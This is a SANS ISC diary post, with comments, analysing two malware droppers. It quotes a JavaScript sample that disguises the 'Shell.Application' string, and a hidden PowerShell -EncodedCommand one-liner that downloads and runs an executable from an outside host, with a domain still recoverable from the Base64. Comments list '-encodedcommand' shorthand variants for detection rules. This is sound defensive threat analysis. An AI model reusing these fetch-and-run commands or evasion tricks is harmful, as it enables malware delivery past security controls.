Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: Diverting built-in features for the bad - SANS Internet Storm Center SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Diverting built-in features for the bad

Sometimes you may find very small pieces of malicious code. Yesterday, I caught this very small Javascript sample with only 2 lines of code:

var d=new ActiveXObject(‘Shell.NormandApplication’.replace(‘Normand’, ‘’));
d.ShellExecute(“PowerShell”,”((New-Object System.Net.WebClient).DownloadFile(‘http://[redacted].exe', ‘xwing.pif’);Start-Process ‘xwing.pif’”,””,””,0);

There is no real obfuscation here, just a trick to avoid the detection of the string ‘Shell.Application’ which often searched by automated tools…

Sometimes, there is no need to implement complex code to bypass detection. A good example comes with PowerShell which has the following cool feature: EncodedCommand[1].

Accepts a base-64-encoded string version of a command. Use this parameter to submit commands to Windows PowerShell that require complex quotation marks or curly braces.

Here is a sample that I also detected yesterday (the lines have been truncated for the readability):

poWERShElL.Exe -ExECutioNPolicy bYpAsS -NOPrOFiLe -WindOwsTyLe HiddEN -enCodEdCoMMANd \
IAAoAG4ARQB3AC0AbwBiAGoAZQBjAFQAIABTAHkAUwBUAGUAbQAuAE4AZQB0AC4AVwBFAGIAQwBsAG\
kARQBOAHQAKQAuAEQAbwB3AE4ATABvAGEARABGAEkAbABFACgAIAAdIGgAdAB0AHAAcwA6AC8ALwBh\
AHIAaQBoAGEAbgB0AHQAcgBhAGQAZQByAHMAbgBnAHAALgBjAG8AbQAvAGkAbQBhAGcAZQBzAC8AUw\
BjAGEAbgBfADIALgBlAHgAZQAdICAALAAgAB0gJABlAG4AdgA6AFQARQBtAFAAXABvAHUAdABwAHUA\
dAAuAGUAeABlAB0gIAApACAAOwAgAGkAbgBWAG8AawBFAC0ARQB4AFAAUgBlAHMAUwBJAG8ATgAgAB\
0gJABFAE4AdgA6AHQARQBNAFAAXABvAHUAdABwAHUAdAAuAGUAeABlAB0g

The decoded Base64 string is:

(nEw-objecT SySTem.Net.WEbCliENt).DowNLoaDFIlE(  https://[redacted]/images/Scan_2.exe  ,  $env:TEmP\output.exe  ) ; inVokE-ExPResSIoN  $ENv:tEMP\output.exe

Nothing fancy, easy to decode but this trick will bypass most of the default security controls. A good idea is to fine tune your regular expressions and filters to catch the "-encodedcommand" string (and ignore the case).

Note that the PE file is downloaded via HTTPS!

[1] https://blogs.msdn.microsoft.com/timid/2014/03/26/powershell-encodedcommand-and-round-trips/

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

Xme

417 Posts
ISC Handler
>A good idea is to fine tune your regular expressions and filters to catch the "-encodedcommand" string (and ignore the case).

Also worth note:

https://www.trustedsec.com/blog/circumventing-encodedcommand-detection-powershell/

"There are 15 different iterations to shorthand EncodedCommand which defenders will typically attempt to key off on. One of the most unknown ones is “-ec” which is shorthanded for “-encodedcommand”. Shorthand encodedcommand that should be added to detection rules below:

-e
-ec
-en
-enc
-enco
-encod
-encode
-encoded
-encodedc
-encodedco
-encodedcom
-encodedcomm
-encodedcomma
-encodedcomman
-encodedcommand
"
Anonymous
Good point! Thanks for sharing!
Xme

417 Posts
ISC Handler
Hi Xavier,

Did you mean to redact the domain in the base64? I figure I am not the only one that decoded it...
ridale

1 Posts
Nope, the goal was to prevent the domain to be indexed by bots etc.
Xme

417 Posts
ISC Handler

Sign Up for Free or Log In to start participating in the conversation!